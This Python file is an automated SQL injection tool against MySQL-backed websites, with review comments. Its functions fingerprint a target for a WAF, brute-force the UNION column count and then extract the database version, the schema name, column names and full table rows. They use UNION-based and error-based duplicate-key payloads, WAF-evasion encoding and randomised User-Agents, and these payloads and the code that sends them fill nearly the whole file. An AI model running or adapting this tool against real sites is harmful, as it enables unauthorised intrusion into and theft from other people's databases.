def id_checker(url, param, waf, nc):
    """Find which column of the UNION SELECT is reflected in the page.

    For every index 0..nc one request is sent whose UNION column list
    (built by turing_range) carries CHAR(088,071,068,079,082,075,013,010)
    at that index; the first index whose response body contains "XGDORK"
    is returned.

    Args:
        url: target URL.
        param: injectable parameter, handed to focpa() to build the base URL.
        waf: 1 to pass every payload through sbws() before sending it.
        nc: column count of the UNION; upper bound (inclusive) of the scan.

    Returns:
        int: the reflected column index. When no index reflects the
        marker a hint is printed and exit(0) is called - it never returns
        None.
    """
    marker_expr = "CHAR(088,071,068,079,082,075,013,010)"

    agent = rand_agent()
    headers = {'User-Agent': agent}
    print(colored(" [+] User-Agent: " + agent, 'green'))

    base_url = focpa(url, param)

    index = 0
    # `<=` on purpose: nc itself is a candidate index.
    while index <= nc:
        column_set = turing_range(nc, index, marker_expr)
        payload = base_url + "-1984 UNION SELECT " + column_set + " --"
        if waf == 1:
            payload = sbws(payload)
        body = requests.get(payload, headers=headers).text.encode('utf-8')
        if 'XGDORK' in body:
            return index
        index += 1

    print(colored(" [!] Id checker failed ", 'red'))
    print(colored(
        " [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
        'red'))
    exit(0)
def heuristic_nc(url, param, waf):
    """Guess the UNION column count by brute force (0..55).

    Each request sends "-1984 UNION SELECT <turing_heur(i)> --" and looks
    for the "XGDORK" marker in the response body; the scan stops at the
    first hit. Progress is printed in bands of ten.

    Args:
        url: target URL.
        param: injectable parameter, handed to focpa() to build the base URL.
        waf: 1 to pass every payload through sbws() before sending it.

    Returns:
        int: i + 1 for the first matching i (the value the callers expect).
        Prints a hint and calls exit(0) when nothing matches.
    """
    progress = {
        1: "- 1 to 10 ",
        11: "- 10 to 20 ",
        21: "- 20 to 30 ",
        31: "- 30 to 40 ",
        41: "- 40 to 55 ",
    }

    agent = rand_agent()
    headers = {'User-Agent': agent}
    print(colored(" [+] User-Agent: " + agent, 'green'))

    base_url = focpa(url, param)

    print(colored(" [*] COUNT, can take a while, wait ...", 'cyan'))
    for guess in range(0, 56):
        payload = base_url + "-1984 UNION SELECT " + turing_heur(guess) + " --"
        if waf == 1:
            payload = sbws(payload)

        if guess in progress:
            print(colored(progress[guess], 'cyan'))

        body = requests.get(payload, headers=headers).text.encode('utf-8')
        if 'XGDORK' in body:
            print(colored(" [!] URL appears as injectable ...", 'green'))
            return guess + 1

    print(colored(" [!] Heuristic nc failed ", 'red'))
    print(colored(
        " [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
        'red'))
    exit(0)
def count_nc(url, param, waf):
    """Count the columns of the injected query with ORDER BY n.

    Sends "<n> ORDER BY <n> --" for n = 1..55 and stops at the first
    response that carries a MySQL "Unknown column ... in 'order clause'"
    error or a mysql_num_rows()/mysql_num_row() PHP warning; the column
    count is then n - 1. Progress is printed in bands of ten.

    Args:
        url: target URL.
        param: injectable parameter, handed to focpa() to build the base URL.
        waf: 1 to pass every payload through sbws() before sending it.

    Returns:
        int: the detected column count. Prints a hint and calls exit(0)
        when no error shows up within 55 columns.
    """
    progress = {
        1: "- 1 to 10 ",
        11: "- 10 to 20 ",
        21: "- 20 to 30 ",
        31: "- 30 to 40 ",
        41: "- 40 to 55 ",
    }

    agent = rand_agent()
    headers = {'User-Agent': agent}
    print(colored(" [+] User-Agent: " + agent, 'green'))

    base_url = focpa(url, param)

    print(colored(" [*] COUNT, Can take a while, wait ...", 'cyan'))
    for guess in range(1, 56):
        payload = base_url + str(guess) + " ORDER BY " + str(guess) + " --"
        if waf == 1:
            payload = sbws(payload)

        if guess in progress:
            print(colored(progress[guess], 'cyan'))

        body = requests.get(payload, headers=headers).text.encode('utf-8')

        order_error = ("Unknown column '" in body
                       and "' in 'order clause'" in body)
        if (order_error or 'mysql_num_rows():' in body
                or 'mysql_num_row():' in body):
            print(colored(" [+] URL appears as injectable ...", 'green'))
            return guess - 1

    print(colored(" [!] Count nc failed ", 'red'))
    print(colored(
        " [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
        'red'))
    exit(0)
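def dumpData_s(url, param, waf, modx, nc, idx, table, fields, dbx):
    """Dump the rows of `fields` from `table` through the injection point.

    Two payload families are used, selected by `modx`:

    * modx == 1 (UNION-based): GROUP_CONCAT over all fields, first with the
      table name quoted, then as a hex literal; when neither response
      carries the "(^#^)" / "(V#V)" cell delimiters, the rows are fetched
      one field at a time with CONCAT ... LIMIT <row>,1.
    * modx == 2 (error-based, duplicate-key trick on FLOOR(RAND(0)*2)):
      one request per row with all fields CONCATenated; on a SQL error the
      rows are fetched one field at a time, cycling through three
      alternative syntaxes.

    Args:
        url, param: target URL and injectable parameter (see focpa()).
        waf: 1 to pass every payload through sbws() before sending it.
        modx: 1 for UNION-based, 2 for error-based extraction.
        nc, idx: column count and reflected column index for turing_range().
        table: table to read from.
        fields: list of column names to extract.
        dbx: schema name, used by the error-based payloads only.

    Returns:
        list of str, one entry per extracted row (the UNION and the
        per-field fallbacks render a row as " cell1 cell2 ..."). Prints a
        hint and calls exit(0) when nothing could be extracted. Returns
        None for any other `modx` (unchanged behaviour).

    Changes against the original version:
    * `data.din(...)` (AttributeError) in the error-based branch is now
      `data.find(...)`.
    * The per-row buffer of the UNION fallback is reset for every row; it
      used to accumulate, so row k repeated rows 0..k-1.
    * The error-based fallback keeps only non-empty cells and stops once
      all three syntaxes are exhausted, instead of re-sending the bare URL
      and storing whitespace-only "rows".
    """
    agent = rand_agent()
    headers = {'User-Agent': agent}
    print(colored(" [+] User-Agent: " + agent, 'green'))

    burl = focpa(url, param)

    def fetch(payload):
        """Send one payload (WAF-encoded when waf == 1); return the body as utf-8 bytes."""
        if waf == 1:
            payload = sbws(payload)
        return requests.get(payload, headers=headers).text.encode('utf-8')

    def has_marker(body):
        """True when at least one cell delimiter survived into the response."""
        return body.find("(V#V)") > -1 or body.find("(^#^)") > -1

    def flatten(body):
        """parserDump(body, 1) rendered as a plain string without list syntax."""
        return str(parserDump(body, 1)).replace('[', '').replace(']', '').replace("'", '')

    def change_syntax():
        print(colored(" [*] Change syntax ... ", 'cyan'))

    def give_up():
        print(colored(" [-] Injection attempt failed ", 'red'))
        print(colored(
            " [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
            'red'))
        exit(0)

    rows = []

    if modx == 1:
        insert_fields = turing_fields(fields)
        rangestr = turing_range(
            nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041)," +
            str(insert_fields) + ",CHAR(040,118,035,118,041))")

        # Attempt 1: quoted table name.
        body = fetch(burl + "-1984 UNION SELECT " + rangestr +
                     " FROM '" + table + "' --")
        if has_marker(body):
            rows = parserDump(body, 0)
        else:
            change_syntax()
            # Attempt 2: hex literal - no quotes to be escaped or filtered.
            body = fetch(burl + "-1984 UNION SELECT " + rangestr +
                         " FROM 0x" + str(table.encode('hex')) + " --")
            if has_marker(body):
                rows = parserDump(body, 0)
            else:
                change_syntax()
                # Attempt 3: one request per (row, field) with CONCAT + LIMIT row,1.
                row = 0
                while True:
                    cells = []
                    for field in fields:
                        rangestr = turing_range(
                            nc, idx, "CONCAT(CHAR(040,094,035,094,041)," +
                            str(field) + ",CHAR(040,118,035,118,041))")
                        body = fetch(burl + "-1984 UNION SELECT " + rangestr +
                                     " FROM " + table + " LIMIT " + str(row) + ",1 --")
                        cell = flatten(body)
                        if cell != '':
                            cells.append(cell)
                    if cells:
                        # Same layout as before: leading space, space-separated cells.
                        rows.append(" " + " ".join(cells))
                    # No delimiter in the last response: LIMIT ran past the last row.
                    if not has_marker(body):
                        break
                    row += 1

        if len(rows) > 0:
            print(str(rows))
            return rows
        give_up()

    elif modx == 2:
        insert_fields = turing_fields(fields)

        # Phase 1: one request per row, all fields in a single CONCAT.
        row = 0
        error_syntax = 0
        while True:
            body = fetch(
                burl + "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(0x28,0x5e,0x23,0x5e,0x29,CONCAT(" +
                str(insert_fields) + ") AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM " +
                str(dbx) + "." + str(table) + " LIMIT " + str(row) +
                ",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --")
            # NOTE(review): precedence kept as in the original - only the
            # "Not found" test is tied to the missing "(^#^)" delimiter;
            # it may have been meant to apply to every error string.
            if (body.find("You have an error in your SQL syntax;") > -1
                    or body.find("Subquery returns more than 1 row") > -1
                    or body.find("this is incompatible ") > -1
                    or body.find("Nothing found!") > -1
                    or (body.find("Not found") > -1
                        and body.find("(^#^)") == -1)):
                error_syntax = 1
                break
            cell = flatten(body)
            if cell == '':
                break  # LIMIT ran past the last row
            rows.append(cell)
            row += 1

        if len(rows) > 0:
            print(str(rows))
            return rows

        # Phase 2: one request per (row, field), cycling through three syntaxes.
        change_syntax()

        def phase2_payload(syntax, field, row):
            """Error-based payload for `field` of row `row` under syntax 1, 2 or 3."""
            head = ("1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT("
                    "0x28,0x5e,0x23,0x5e,0x29," + str(field) +
                    ",0x28,0x56,0x23,0x56,0x29) FROM ")
            limit = " LIMIT " + str(row) + ",1),FLOOR(RAND(0)*2))x FROM "
            if syntax == 1:
                return (head + str(dbx) + "." + str(table) + limit +
                        "INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --")
            if syntax == 2:
                # NOTE(review): "FROM <table>=<db>.<hex>" is kept verbatim;
                # it does not look like valid MySQL - confirm against a target.
                return (head + str(table) + "=" + str(dbx) + "." +
                        str(table).encode('hex') + limit +
                        "INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --")
            return (head + str(dbx) + "." + str(table) + limit +
                    str(dbx) + "." + str(table) + " GROUP BY x)a) --")

        row = 0
        while error_syntax in (1, 2, 3):
            cells = []
            j = 0
            while j < len(fields) and error_syntax in (1, 2, 3):
                body = fetch(burl + phase2_payload(error_syntax, fields[j], row))
                if (body.find("You have an error in your SQL syntax;") > -1
                        or (body.find("Error in SQL Query") > -1
                            and body.find("(^#^)") == -1)):
                    # Retry the same field with the next syntax from row 0;
                    # cells collected under the old syntax belong to no row.
                    change_syntax()
                    error_syntax += 1
                    row = 0
                    cells = []
                    continue
                cell = flatten(body)
                if cell != '':
                    cells.append(cell)
                j += 1
            if not cells:
                break
            rows.append(" " + " ".join(cells))
            if body.find("(^#^)") == -1:
                break
            row += 1

        if len(rows) > 0:
            print(str(rows))
            return rows
        give_up()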
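def dumpColumns(url, param, waf, modx, nc, idx, table):
    """List the column names of `table` in the current database.

    * modx == 1 (UNION-based): GROUP_CONCAT(COLUMN_NAME) from
      INFORMATION_SCHEMA.COLUMNS, first with the table name quoted, then
      as a hex literal; when neither response carries the "(^#^)" /
      "(V#V)" delimiters, one column per request with CONCAT ... LIMIT
      <row>,1.
    * modx == 2 (error-based, duplicate-key trick on FLOOR(RAND(0)*2)):
      one column per request; on a SQL error the next of three syntaxes
      is tried.

    Args:
        url, param: target URL and injectable parameter (see focpa()).
        waf: 1 to pass every payload through sbws() before sending it.
        modx: 1 for UNION-based, 2 for error-based extraction.
        nc, idx: column count and reflected column index for turing_range().
        table: table whose columns are listed.

    Returns:
        list of str column names. Prints a hint and calls exit(0) when
        nothing could be extracted; returns None for any other `modx`
        (unchanged behaviour).

    Changes against the original version:
    * After a syntax change the error-based loop restarted at LIMIT 1,1
      (the row index was reset to 0 and then incremented), skipping the
      first column; it now restarts at LIMIT 0,1.
    * Once the three error-based syntaxes are exhausted the loop stops;
      it used to re-send the bare URL and, whenever that page matched one
      of the error strings (e.g. contained "not found"), never terminated.
    """
    agent = rand_agent()
    headers = {'User-Agent': agent}
    print(colored(" [+] User-Agent: " + agent, 'green'))

    burl = focpa(url, param)

    def fetch(payload):
        """Send one payload (WAF-encoded when waf == 1); return the body as utf-8 bytes."""
        if waf == 1:
            payload = sbws(payload)
        return requests.get(payload, headers=headers).text.encode('utf-8')

    def has_marker(body):
        """True when at least one cell delimiter survived into the response."""
        return body.find("(V#V)") > -1 or body.find("(^#^)") > -1

    def flatten(body):
        """parserDump(body, 1) rendered as a plain string without list syntax."""
        return str(parserDump(body, 1)).replace('[', '').replace(']', '').replace("'", '')

    def change_syntax():
        print(colored(" [*] Change syntax ... ", 'cyan'))

    def give_up():
        print(colored(" [-] Injection attempt failed ", 'red'))
        print(colored(
            " [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
            'red'))
        exit(0)

    columns = []

    if modx == 1:
        rangestr = turing_range(
            nc, idx,
            "GROUP_CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))"
        )
        from_cols = " FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME"

        # Attempt 1: quoted table name.
        body = fetch(burl + "-1984 UNION SELECT " + rangestr + from_cols +
                     "='" + table + "' --")
        if has_marker(body):
            columns = parserDump(body, 0)
        else:
            change_syntax()
            # Attempt 2: hex literal - no quotes to be escaped or filtered.
            body = fetch(burl + "-1984 UNION SELECT " + rangestr + from_cols +
                         " LIKE 0x" + str(table).encode('hex') + " --")
            if has_marker(body):
                columns = parserDump(body, 0)
            else:
                change_syntax()
                # Attempt 3: one column per request with CONCAT + LIMIT row,1.
                rangestr = turing_range(
                    nc, idx,
                    "CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))"
                )
                row = 0
                while True:
                    body = fetch(burl + "-1984 UNION SELECT " + rangestr + from_cols +
                                 " LIKE 0x" + str(table).encode('hex') +
                                 " LIMIT " + str(row) + ",1 --")
                    cell = flatten(body)
                    if cell != '':
                        columns.append(cell)
                    # No delimiter in the response: LIMIT ran past the last column.
                    if not has_marker(body):
                        break
                    row += 1

        if len(columns) > 0:
            print(str(columns))
            return columns
        give_up()

    elif modx == 2:
        hex_table = table.encode('hex')

        def payload(syntax, row):
            """Error-based payload for column `row` under syntax 0, 1 or 2."""
            limit = " LIMIT " + str(row) + ",1),FLOOR(RAND(0)*2))x FROM "
            if syntax == 0:
                return ("1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT("
                        "0x28,0x5e,0x23,0x5e,0x29,CAST(COLUMN_NAME AS CHAR),0x28,0x56,0x23,0x56,0x29)) "
                        "FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x" + hex_table +
                        limit + "INFORMATION_SCHEMA.TABLES GROUP BY x)a) --")
            if syntax == 1:
                schema_test = "TABLE_SCHEMA=database()"
            else:
                schema_test = "TABLE_SCHEMA LIKE database()"
            return ("1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT("
                    "0x28,0x5e,0x23,0x5e,0x29,COLUMN_NAME,0x28,0x56,0x23,0x56,0x29) "
                    "FROM INFORMATION_SCHEMA.COLUMNS WHERE " + schema_test +
                    " AND TABLE_NAME=0x" + hex_table +
                    limit + "INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --")

        row = 0
        syntax = 0
        # Stops when the three syntaxes are exhausted (syntax == 3).
        while syntax in (0, 1, 2):
            body = fetch(burl + payload(syntax, row))
            # NOTE(review): precedence kept as in the original - only the
            # "not found" test is tied to the missing "(^#^)" delimiter.
            if (body.find("You have an error in your SQL syntax;") > -1
                    or body.find("Subquery returns more than 1 row") > -1
                    or body.find("this is incompatible ") > -1
                    or body.find("Nothing found!") > -1
                    or (body.find("not found") > -1
                        and body.find("(^#^)") == -1)):
                change_syntax()
                syntax += 1
                row = 0  # restart from the first column under the new syntax
                continue
            cell = flatten(body)
            if cell == '':
                break  # LIMIT ran past the last column
            columns.append(cell)
            row += 1

        if len(columns) > 0:
            print(str(columns))
            return columns
        give_up()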
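def dumpDatabase(url, param, waf, modx, nc, idx):
    """Confirm the injection and read @@version / database().

    * modx == 1 (UNION-based): GROUP_CONCAT(@@version, database()) in the
      reflected column, falling back to plain CONCAT.
    * modx == 2 (error-based): version() and then database() are each
      tried with up to three duplicate-key payloads (GROUP BY ... HAVING,
      the FLOOR(RAND(0)*2) subquery, then the CEILING/CONVERT variant).

    On success the session is saved to "tmpfile" in the current directory
    (modx, waf, database name, nc, idx - one value per line) for the other
    dump* steps and the extracted values are returned. On failure a hint
    is printed and exit(0) is called.

    Args:
        url, param: target URL and injectable parameter (see focpa()).
        waf: 1 to pass every payload through sbws() before sending it.
        modx: 1 for UNION-based, 2 for error-based extraction.
        nc, idx: column count and reflected column index for turing_range().

    Returns:
        list: parserDump() output for modx == 1; [version, database] for
        modx == 2; None for any other `modx` (unchanged behaviour).

    Changes against the original version:
    * The third version() probe passed `headers == headers` (i.e. True)
      as the positional params argument instead of the headers.
    * The third database() probe called sbws(nul) - NameError.
    * The second version() probe used FL0OR (digit zero) where the same
      payload for database() uses FLOOR.
    * The `tmpfile = file` placeholder is gone and the file is written
      inside a `with` block.
    """
    agent = rand_agent()
    headers = {'User-Agent': agent}
    print(colored(" [+] User-Agent: " + agent, 'green'))

    burl = focpa(url, param)

    def fetch(payload):
        """Send one payload (WAF-encoded when waf == 1); return the body as utf-8 bytes."""
        if waf == 1:
            payload = sbws(payload)
        return requests.get(payload, headers=headers).text.encode('utf-8')

    def flatten(body):
        """parserDump(body, 1) rendered as a plain string without list syntax."""
        return str(parserDump(body, 1)).replace('[', '').replace(']', '').replace("'", '')

    def change_syntax():
        print(colored(" [*] Change syntax ... ", 'cyan'))

    def give_up():
        print(colored(" [-] Injection attempt failed ", 'red'))
        print(colored(
            " [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')",
            'red'))
        exit(0)

    def save_session(dbname):
        """Persist what the follow-up dump steps read back, one value per line."""
        # NOTE(review): fixed relative path in the CWD, as before.
        with open("tmpfile", 'w') as fh:
            fh.write(str(modx) + "\n")
            fh.write(str(waf) + "\n")
            fh.write(str(dbname) + "\n")
            fh.write(str(nc) + "\n")
            fh.write(str(idx) + "\n")

    if modx == 1:
        rangestr = turing_range(
            nc, idx,
            "GROUP_CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))"
        )
        body = fetch(burl + "-1984 UNION SELECT " + rangestr + " --")

        if body.find("(V#V)") == -1 and body.find("(^#^)") == -1:
            change_syntax()
            rangestr = turing_range(
                nc, idx,
                "CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))"
            )
            body = fetch(burl + "-1984 UNION SELECT " + rangestr + " --")

        database_list = parserDump(body, 1)
        if len(database_list) > 0:
            print(colored(" [+] URL is injectable", 'green'))
            print(str(database_list))
            save_session(database_list[0])
            return database_list
        give_up()

    elif modx == 2:
        def probe(payloads):
            """Send the payloads in order until one reflects "(^#^)"; return the flattened last body."""
            body = ""
            last = len(payloads) - 1
            for k, payload in enumerate(payloads):
                body = fetch(burl + payload)
                if body.find("(^#^)") > -1 or k == last:
                    break
                change_syntax()
            return flatten(body)

        version = probe([
            "1 OR 1984 GROUP BY CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,floor(rand(0)*2)) HAVING MIN(0) OR 1 --",
            "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --",
            "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --",
        ])
        if version == '':
            give_up()

        print(colored(" [+] URL appears as injectable ...", 'green'))
        dbname = probe([
            "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(database() AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --",
            "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --",
            "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --",
        ])
        if dbname == '':
            give_up()

        database_list = [version, dbname]
        print(colored(" [+] URL is injectable", 'green'))
        print(str(database_list))
        save_session(dbname)
        return database_list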
def stress_url(url, param):
    """Fingerprint the injection point: WAF presence and extraction mode.

    Three probes are sent in order:
    1. "1984 AND CONCAT(CHAR(...))" - a "Mod_Security" or "You don't have
       permission " response marks a WAF (later probes then go through
       sbws()).
    2. a 300-column UNION SELECT (column 155 is database()) - the MySQL
       "The used SELECT statements " error marks error-based mode (2).
    3. "777 ORDER BY 777" - an "Unknown column ... in 'order clause'"
       error or a mysql_num_rows()/mysql_num_row() warning marks
       UNION-based mode (1); anything else falls back to the heuristic
       UNION mode (3).

    Args:
        url: target URL.
        param: injectable parameter, handed to focpa() to build the base URL.

    Returns:
        [waf, mode] where waf is 1 when a WAF was detected (else 0) and
        mode is 2, 1 or 3 as described above.
    """
    base_url = focpa(url, param)

    agent = rand_agent()
    headers = {'User-Agent': agent}
    print(colored(" [+] User-Agent: " + agent, 'green'))
    print(colored(" [*] Stress URL ... ", 'green'))

    def fetch(payload, encode):
        """Send one payload, through sbws() when `encode`; return the body as utf-8 bytes."""
        if encode:
            payload = sbws(payload)
        return requests.get(payload, headers=headers).text.encode('utf-8')

    # Probe 1: WAF fingerprint (never encoded - the WAF flag is not known yet).
    body = fetch(base_url + "1984 AND CONCAT(CHAR(088,071,068,079,082,075,013,010))", False)
    waf = 0
    if "Mod_Security" in body or "You don't have permission " in body:
        print(colored(" [!] WAF Detected ! ", 'red'))
        waf = 1

    # Probe 2: 300-column UNION, column 155 replaced by database().
    column_list = ",".join(
        "database()" if k == 155 else str(k) for k in range(1, 301))
    body = fetch(base_url + "-300 UNION SELECT " + column_list + " --", waf == 1)
    if 'The used SELECT statements ' in body:
        print(colored(" [!] ERROR-BASED FOUND !", 'green'))
        return [waf, 2]

    # Probe 3: ORDER BY on an impossible column index.
    body = fetch(base_url + "777 ORDER BY 777 --", waf == 1)
    order_error = ("Unknown column '" in body
                   and "' in 'order clause'" in body)
    if (order_error or 'mysql_num_rows():' in body
            or 'mysql_num_row():' in body):
        print(colored(" [!] UNION-BASED FOUND !", 'green'))
        return [waf, 1]

    print(colored(" [*] TEST HEURISTIC-UNION ...", 'green'))
    return [waf, 3]